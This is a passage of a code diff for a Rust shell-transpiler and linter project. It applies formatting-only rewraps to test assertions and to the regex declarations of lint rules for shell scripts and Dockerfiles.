+        "BP005 should trigger for scripts over 50 lines"
+    );
     assert_eq!(bp005.unwrap().severity, AuditSeverity::Suggestion);
 }
 
@@ -614,15 +627,24 @@ content = "echo hello"
     // security_only disables quality, hermetic, and best practices checks
     // and has min_severity = Warning
     assert!(
-        !report.findings.iter().any(|f| f.category == AuditCategory::Quality),
+        !report
+            .findings
+            .iter()
+            .any(|f| f.category == AuditCategory::Quality),
         "Security-only context should not produce quality findings"
     );
     assert!(
-        !report.findings.iter().any(|f| f.category == AuditCategory::Hermetic),
+        !report
+            .findings
+            .iter()
+            .any(|f| f.category == AuditCategory::Hermetic),
         "Security-only context should not produce hermetic findings"
     );
     assert!(
-        !report.findings.iter().any(|f| f.category == AuditCategory::BestPractices),
+        !report
+            .findings
+            .iter()
+            .any(|f| f.category == AuditCategory::BestPractices),
         "Security-only context should not produce best practices findings"
     );
 }
@@ -748,7 +770,10 @@ content = "echo b"
     assert_eq!(report.installer_version, "2.0.0");
     assert_eq!(report.metadata.steps_audited, 2);
     assert_eq!(report.metadata.artifacts_audited, 2);
-    assert!(!report.metadata.audited_at.is_empty(), "audited_at should be set");
+    assert!(
+        !report.metadata.audited_at.is_empty(),
+        "audited_at should be set"
+    );
 }
 
 // =============================================================================

--- a/rash/src/ir/ir_expr_tests.rs
+++ b/rash/src/ir/ir_expr_tests.rs
@@ -426,10 +426,7 @@ fn echo(msg: &str) {}
 #[test]
 fn test_IR_EXPR_027_literal_string() {
     let out = transpile_main(r#"let name = "Alice";"#);
-    assert!(
-        out.contains("Alice"),
-        "Expected Alice in output:\n{out}"
-    );
+    assert!(out.contains("Alice"), "Expected Alice in output:\n{out}");
 }
 
 // ====================================================================
@@ -439,10 +436,7 @@ fn test_IR_EXPR_027_literal_string() {
 #[test]
 fn test_IR_EXPR_028_literal_integer() {
     let out = transpile_main("let count = 99;");
-    assert!(
-        out.contains("99"),
-        "Expected 99 in output:\n{out}"
-    );
+    assert!(out.contains("99"), "Expected 99 in output:\n{out}");
 }
 
 // ====================================================================
@@ -578,10 +572,7 @@ fn main() {
 fn test_IR_EXPR_035_exec_effects_curl() {
     // Ensure transpile succeeds for exec("curl ...")
     let out = transpile_main(r#"exec("curl http://example.com");"#);
-    assert!(
-        out.contains("eval"),
-        "Expected eval for exec() in:\n{out}"
-    );
+    assert!(out.contains("eval"), "Expected eval for exec() in:\n{out}");
 }
 
 // ====================================================================
@@ -602,7 +593,10 @@ fn main() {
         &Config::default(),
     );
     // The transpiler should handle this without error
-    assert!(result.is_ok(), "Method call should not cause transpile failure");
+    assert!(
+        result.is_ok(),
+        "Method call should not cause transpile failure"
+    );
 }
 
 // ====================================================================
@@ -613,7 +607,10 @@ fn main() {
 fn test_IR_EXPR_037_div_by_zero_literal() {
     // The transpiler generates shell code; runtime division by zero is a shell concern.
     // Constant folding may catch this or pass it through
-    let result = crate::transpile("fn main() { let a = 10; let b = 0; let x = a / b; }", &Config::default());
+    let result = crate::transpile(
+        "fn main() { let a = 10; let b = 0; let x = a / b; }",
+        &Config::default(),
+    );
     assert!(result.is_ok(), "Division by zero should still transpile");
 }
 
@@ -623,11 +620,10 @@ fn test_IR_EXPR_037_div_by_zero_literal() {
 
 #[test]
 fn test_IR_EXPR_038_chained_shift() {
-    let out = transpile_full("fn main() { let a = 1; let b = 2; let c = 3; let x = a << b; let y = x << c; }");
-    assert!(
-        out.contains("<<"),
-        "Expected << operator in:\n{out}"
+    let out = transpile_full(
+        "fn main() { let a = 1; let b = 2; let c = 3; let x = a << b; let y = x << c; }",
     );
+    assert!(out.contains("<<"), "Expected << operator in:\n{out}");
 }
 
 // ====================================================================
@@ -647,7 +643,10 @@ fn main() {
 "#,
     );
     assert!(out.contains("while"), "Expected while in:\n{out}");
-    assert!(out.contains("-lt"), "Expected -lt in while condition:\n{out}");
+    assert!(
+        out.contains("-lt"),
+        "Expected -lt in while condition:\n{out}"
+    );
 }
 
 // ====================================================================

--- a/rash/src/ir/ir_pattern_tests.rs
+++ b/rash/src/ir/ir_pattern_tests.rs
@@ -15,8 +15,8 @@
 #![allow(clippy::unwrap_used)]
 #![allow(clippy::expect_used)]
 
-use crate::transpile;
 use crate::models::Config;
+use crate::transpile;
 
 fn transpile_ok(code: &str) -> String {
     transpile(code, &Config::default()).unwrap()
@@ -459,7 +459,10 @@ fn test_IRPAT_022_no_range_patterns_uses_case() {
     "#;
     let out = transpile_ok(code);
     // Without range patterns, should use case statement
-    assert!(out.contains("case") || out.contains("result="), "Case statement: {out}");
+    assert!(
+        out.contains("case") || out.contains("result="),
+        "Case statement: {out}"
+    );
 }
 
 #[test]
@@ -514,7 +517,10 @@ fn test_IRPAT_025_standalone_range_match() {
         }
     "#;
     let out = transpile_ok(code);
-    assert!(out.contains("low") || out.contains("mid") || out.contains("high"), "Range match: {out}");
+    assert!(
+        out.contains("low") || out.contains("mid") || out.contains("high"),
+        "Range match: {out}"
+    );
 }
 
 // ---------------------------------------------------------------------------

--- a/rash/src/linter/lint_shell_coverage_tests.rs
+++ b/rash/src/linter/lint_shell_coverage_tests.rs
@@ -367,7 +367,10 @@ fn test_lint_shell_idem_mkdir() {
     let script = "mkdir /tmp/newdir\n";
     let result = lint_shell(script);
     assert!(
-        result.diagnostics.iter().any(|d| d.code.starts_with("IDEM")),
+        result
+            .diagnostics
+            .iter()
+            .any(|d| d.code.starts_with("IDEM")),
         "Should detect non-idempotent mkdir"
     );
 }
@@ -699,10 +702,7 @@ fn test_lint_shell_result_has_diagnostic_fields() {
             !diag.message.is_empty(),
             "Diagnostic message should not be empty"
         );
-        assert!(
-            diag.span.start_line >= 1,
-            "Diagnostic line should be >= 1"
-        );
+        assert!(diag.span.start_line >= 1, "Diagnostic line should be >= 1");
     }
 }
 
@@ -928,9 +928,18 @@ for f in *.txt; do echo $f; done
 
 #[test]
 fn test_lint_profile_from_str() {
-    assert_eq!("standard".parse::<LintProfile>().unwrap(), LintProfile::Standard);
-    assert_eq!("default".parse::<LintProfile>().unwrap(), LintProfile::Standard);
-    assert_eq!("coursera".parse::<LintProfile>().unwrap(), LintProfile::Coursera);
+    assert_eq!(
+        "standard".parse::<LintProfile>().unwrap(),
+        LintProfile::Standard
+    );
+    assert_eq!(
+        "default".parse::<LintProfile>().unwrap(),
+        LintProfile::Standard
+    );
+    assert_eq!(
+        "coursera".parse::<LintProfile>().unwrap(),
+        LintProfile::Coursera
+    );
     assert_eq!(
         "coursera-labs".parse::<LintProfile>().unwrap(),
         LintProfile::Coursera
@@ -1215,10 +1224,7 @@ fn test_lint_shell_many_lines() {
 #[test]
 fn test_lint_shell_with_path_unknown_extension() {
     // Unknown extension should fall back to auto-detection
-    let result = lint_shell_with_path(
-        Path::new("script.xyz"),
-        "#!/bin/bash\necho hello\n",
-    );
+    let result = lint_shell_with_path(Path::new("script.xyz"), "#!/bin/bash\necho hello\n");
     let _count = result.diagnostics.len();
 }
 

--- a/rash/src/linter/rules/docker003_tests.rs
+++ b/rash/src/linter/rules/docker003_tests.rs
@@ -8,42 +8,60 @@ use super::docker003;
 fn test_docker003_apt_install_without_cleanup() {
     let source = "FROM ubuntu:22.04\nRUN apt-get update && apt-get install -y curl\n";
     let result = docker003::check(source);
-    assert!(!result.diagnostics.is_empty(), "Should flag apt-get install without cleanup");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Should flag apt-get install without cleanup"
+    );
 }
 
 #[test]
 fn test_docker003_apt_install_with_cleanup() {
     let source = "FROM ubuntu:22.04\nRUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*\n";
     let result = docker003::check(source);
-    assert!(result.diagnostics.is_empty(), "Should not flag with cleanup present");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Should not flag with cleanup present"
+    );
 }
 
 #[test]
 fn test_docker003_no_apt_install() {
     let source = "FROM ubuntu:22.04\nRUN echo hello\n";
     let result = docker003::check(source);
-    assert!(result.diagnostics.is_empty(), "No apt-get install means no violation");
+    assert!(
+        result.diagnostics.is_empty(),
+        "No apt-get install means no violation"
+    );
 }
 
 #[test]
 fn test_docker003_multiline_run_with_apt_no_cleanup() {
     let source = "FROM ubuntu:22.04\nRUN apt-get update \\\n    && apt-get install -y curl\n";
     let result = docker003::check(source);
-    assert!(!result.diagnostics.is_empty(), "Multiline RUN without cleanup should be flagged");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Multiline RUN without cleanup should be flagged"
+    );
 }
 
 #[test]
 fn test_docker003_multiline_run_with_cleanup() {
     let source = "FROM ubuntu:22.04\nRUN apt-get update \\\n    && apt-get install -y curl \\\n    && rm -rf /var/lib/apt/lists/*\n";
     let result = docker003::check(source);
-    assert!(result.diagnostics.is_empty(), "Multiline RUN with cleanup is fine");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Multiline RUN with cleanup is fine"
+    );
 }
 
 #[test]
 fn test_docker003_multiple_run_commands() {
     let source = "FROM ubuntu:22.04\nRUN echo setup\nRUN apt-get install -y git\nRUN echo done\n";
     let result = docker003::check(source);
-    assert!(!result.diagnostics.is_empty(), "Second RUN with apt-get should be flagged");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Second RUN with apt-get should be flagged"
+    );
 }
 
 #[test]
@@ -80,5 +98,8 @@ fn test_docker003_diagnostic_message() {
 fn test_docker003_run_at_end_no_newline() {
     let source = "FROM ubuntu:22.04\nRUN apt-get update \\\n    && apt-get install -y vim";
     let result = docker003::check(source);
-    assert!(!result.diagnostics.is_empty(), "Trailing multiline RUN should be checked");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Trailing multiline RUN should be checked"
+    );
 }

--- a/rash/src/linter/rules/docker004_tests.rs
+++ b/rash/src/linter/rules/docker004_tests.rs
@@ -8,28 +8,41 @@ use super::docker004;
 fn test_docker004_valid_copy_from_stage() {
     let source = "FROM golang:1.21 AS builder\nRUN go build\nFROM alpine:3.18\nCOPY --from=builder /app /app\n";
     let result = docker004::check(source);
-    assert!(result.diagnostics.is_empty(), "Valid stage reference should pass");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Valid stage reference should pass"
+    );
 }
 
 #[test]
 fn test_docker004_invalid_copy_from_stage() {
-    let source = "FROM golang:1.21 AS builder\nFROM alpine:3.18\nCOPY --from=nonexistent /app /app\n";
+    let source =
+        "FROM golang:1.21 AS builder\nFROM alpine:3.18\nCOPY --from=nonexistent /app /app\n";
     let result = docker004::check(source);
-    assert!(!result.diagnostics.is_empty(), "Invalid stage reference should fail");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Invalid stage reference should fail"
+    );
 }
 
 #[test]
 fn test_docker004_numeric_stage_reference() {
     let source = "FROM golang:1.21\nFROM alpine:3.18\nCOPY --from=0 /app /app\n";
     let result = docker004::check(source);
-    assert!(result.diagnostics.is_empty(), "Numeric stage reference is always valid");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Numeric stage reference is always valid"
+    );
 }
 
 #[test]
 fn test_docker004_no_copy_from() {
     let source = "FROM ubuntu:22.04\nCOPY app.py /app/\n";
     let result = docker004::check(source);
-    assert!(result.diagnostics.is_empty(), "Regular COPY without --from is fine");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Regular COPY without --from is fine"
+    );
 }
 
 #[test]
@@ -50,7 +63,11 @@ fn test_docker004_multiple_stages() {
 fn test_docker004_mixed_valid_invalid() {
     let source = "FROM golang:1.21 AS builder\nFROM alpine:3.18\nCOPY --from=builder /app /app\nCOPY --from=missing /other /other\n";
     let result = docker004::check(source);
-    assert_eq!(result.diagnostics.len(), 1, "Only the invalid reference should fail");
+    assert_eq!(
+        result.diagnostics.len(),
+        1,
+        "Only the invalid reference should fail"
+    );
 }
 
 #[test]
@@ -58,7 +75,10 @@ fn test_docker004_case_sensitive_stage_name() {
     let source = "FROM golang:1.21 AS Builder\nFROM alpine:3.18\nCOPY --from=builder /app /app\n";
     let result = docker004::check(source);
     // Stage names are case-sensitive: Builder != builder
-    assert!(!result.diagnostics.is_empty(), "Case mismatch should be flagged");
+    assert!(
+        !result.diagnostics.is_empty(),
+        "Case mismatch should be flagged"
+    );
 }
 
 #[test]
@@ -80,12 +100,19 @@ fn test_docker004_no_from_directive() {
 fn test_docker004_numeric_stage_1() {
     let source = "FROM golang:1.21\nFROM node:18\nFROM alpine:3.18\nCOPY --from=1 /dist /dist\n";
     let result = docker004::check(source);
-    assert!(result.diagnostics.is_empty(), "Numeric index 1 is always valid");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Numeric index 1 is always valid"
+    );
 }
 
 #[test]
 fn test_docker004_stage_name_with_hyphens() {
-    let source = "FROM golang:1.21 AS my-builder\nFROM alpine:3.18\nCOPY --from=my-builder /app /app\n";
+    let source =
+        "FROM golang:1.21 AS my-builder\nFROM alpine:3.18\nCOPY --from=my-builder /app /app\n";
     let result = docker004::check(source);
-    assert!(result.diagnostics.is_empty(), "Hyphenated stage name should work");
+    assert!(
+        result.diagnostics.is_empty(),
+        "Hyphenated stage name should work"
+    );
 }

--- a/rash/src/linter/rules/idem003.rs
+++ b/rash/src/linter/rules/idem003.rs
@@ -27,9 +27,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for ln -s without rm -f first
-static LN_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bln\s+(-[a-z]*s[a-z]*)\s").unwrap()
-});
+static LN_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bln\s+(-[a-z]*s[a-z]*)\s").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/perf001.rs
+++ b/rash/src/linter/rules/perf001.rs
@@ -24,9 +24,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for useless use of cat piped to another command
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bcat\s+([^\s|;&]+)\s*\|\s*(\w+)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bcat\s+([^\s|;&]+)\s*\|\s*(\w+)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/perf004.rs
+++ b/rash/src/linter/rules/perf004.rs
@@ -25,9 +25,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for find -exec with \; instead of +
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bfind\b.*\-exec\b.*\{\}\s*(\\;|';')").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bfind\b.*\-exec\b.*\{\}\s*(\\;|';')").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/perf005.rs
+++ b/rash/src/linter/rules/perf005.rs
@@ -28,9 +28,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for external echo/printf instead of builtin
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"(/(?:usr/)?bin/(echo|printf))\b").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"(/(?:usr/)?bin/(echo|printf))\b").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/port001.rs
+++ b/rash/src/linter/rules/port001.rs
@@ -35,9 +35,8 @@ fn is_posix_sh(source: &str) -> bool {
 }
 
 /// Check for array syntax in POSIX sh scripts
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\b\w+=\(").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\b\w+=\(").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/port004.rs
+++ b/rash/src/linter/rules/port004.rs
@@ -37,9 +37,8 @@ fn is_posix_sh(source: &str) -> bool {
 }
 
 /// Check for process substitution in POSIX sh scripts
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"[<>]\(").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"[<>]\(").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/rel001.rs
+++ b/rash/src/linter/rules/rel001.rs
@@ -25,9 +25,8 @@ use crate::linter::{Diagnostic, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for destructive commands without error checking
-static DESTRUCTIVE_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\b(rm\s+-rf|rm\s+-r\s+-f|rm\s+-fr)\b").unwrap()
-});
+static DESTRUCTIVE_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\b(rm\s+-rf|rm\s+-r\s+-f|rm\s+-fr)\b").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/rel003.rs
+++ b/rash/src/linter/rules/rel003.rs
@@ -25,9 +25,8 @@ use crate::linter::{Diagnostic, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for read without -t timeout
-static READ_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bread\b").unwrap()
-});
+static READ_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bread\b").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/rel005.rs
+++ b/rash/src/linter/rules/rel005.rs
@@ -28,9 +28,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for hardcoded temp file paths
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"/tmp/[a-zA-Z_][a-zA-Z0-9_.\-]*").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"/tmp/[a-zA-Z_][a-zA-Z0-9_.\-]*").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2001.rs
+++ b/rash/src/linter/rules/sc2001.rs
@@ -31,7 +31,8 @@ static PATTERN1: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
 });
 
 static PATTERN2: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"\$\(echo\s+"\$(\w+)"\s*\|\s*sed\s+'s/([a-zA-Z0-9_]+)/([a-zA-Z0-9_]+)/'\)"#).unwrap()
+    Regex::new(r#"\$\(echo\s+"\$(\w+)"\s*\|\s*sed\s+'s/([a-zA-Z0-9_]+)/([a-zA-Z0-9_]+)/'\)"#)
+        .unwrap()
 });
 
 /// Check for sed usage that could be replaced with parameter expansion

--- a/rash/src/linter/rules/sc2002.rs
+++ b/rash/src/linter/rules/sc2002.rs
@@ -27,9 +27,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for useless use of cat
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"cat\s+([^\s|]+)\s*\|\s*(\w+)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"cat\s+([^\s|]+)\s*\|\s*(\w+)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2008.rs
+++ b/rash/src/linter/rules/sc2008.rs
@@ -40,9 +40,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\|\s*echo(\s|$)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\|\s*echo(\s|$)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2009.rs
+++ b/rash/src/linter/rules/sc2009.rs
@@ -40,9 +40,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"ps\s+[^|]*\|\s*grep").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"ps\s+[^|]*\|\s*grep").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2010.rs
+++ b/rash/src/linter/rules/sc2010.rs
@@ -30,9 +30,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bls\b[^|]*\|\s*grep").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bls\b[^|]*\|\s*grep").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2011.rs
+++ b/rash/src/linter/rules/sc2011.rs
@@ -29,9 +29,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bls\b[^|]*\|\s*xargs").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bls\b[^|]*\|\s*xargs").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2012.rs
+++ b/rash/src/linter/rules/sc2012.rs
@@ -24,9 +24,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bls\b[^|]*\|\s*while\s+read").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bls\b[^|]*\|\s*while\s+read").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2013.rs
+++ b/rash/src/linter/rules/sc2013.rs
@@ -22,9 +22,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"for\s+\w+\s+in\s+\$\(\s*cat").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"for\s+\w+\s+in\s+\$\(\s*cat").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2014.rs
+++ b/rash/src/linter/rules/sc2014.rs
@@ -25,9 +25,8 @@ use crate::linter::diagnostic::FixSafetyLevel;
 use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\{\$\w+\.\.[^\}]*\}|\{[^\$]*\.\.\$\w+\}").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\{\$\w+\.\.[^\}]*\}|\{[^\$]*\.\.\$\w+\}").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2028.rs
+++ b/rash/src/linter/rules/sc2028.rs
@@ -30,12 +30,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for echo with escape sequences without -e flag
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"echo\s+["']([^"']*\\[nt][^"']*)["']"#).unwrap()
-});
-static ECHO_E_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"echo\s+-e\s+").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r#"echo\s+["']([^"']*\\[nt][^"']*)["']"#).unwrap());
+static ECHO_E_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"echo\s+-e\s+").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2034.rs
+++ b/rash/src/linter/rules/sc2034.rs
@@ -30,12 +30,10 @@ use regex::Regex;
 use std::collections::{HashMap, HashSet};
 
 /// Check for variables assigned but never used
-static ASSIGN_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"^([A-Za-z_][A-Za-z0-9_]*)=").unwrap()
-});
-static USE_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?").unwrap()
-});
+static ASSIGN_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"^([A-Za-z_][A-Za-z0-9_]*)=").unwrap());
+static USE_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2044.rs
+++ b/rash/src/linter/rules/sc2044.rs
@@ -33,9 +33,8 @@ use crate::linter::{Diagnostic, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for find in for loops without -print0
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"for\s+(\w+)\s+in\s+\$\(find\s+([^)]+)\)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"for\s+(\w+)\s+in\s+\$\(find\s+([^)]+)\)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2045.rs
+++ b/rash/src/linter/rules/sc2045.rs
@@ -33,12 +33,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for ls in for loops
-static PATTERN1: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"for\s+\w+\s+in\s+\$\(ls([^)]*)\)").unwrap()
-});
-static PATTERN2: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"for\s+\w+\s+in\s+`ls([^`]*)`").unwrap()
-});
+static PATTERN1: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"for\s+\w+\s+in\s+\$\(ls([^)]*)\)").unwrap());
+static PATTERN2: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"for\s+\w+\s+in\s+`ls([^`]*)`").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2046.rs
+++ b/rash/src/linter/rules/sc2046.rs
@@ -10,12 +10,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for unquoted command substitutions (SC2046)
-static CMD_SUB_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"(?m)(?P<pre>[^"']|^)\$\((?P<cmd>[^)]+)\)"#).unwrap()
-});
-static BACKTICK_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"(?m)(?P<pre>[^"']|^)`(?P<cmd>[^`]+)`"#).unwrap()
-});
+static CMD_SUB_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r#"(?m)(?P<pre>[^"']|^)\$\((?P<cmd>[^)]+)\)"#).unwrap());
+static BACKTICK_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r#"(?m)(?P<pre>[^"']|^)`(?P<cmd>[^`]+)`"#).unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2048.rs
+++ b/rash/src/linter/rules/sc2048.rs
@@ -32,9 +32,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for unquoted $* that should be "$@"
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\$\*").unwrap()
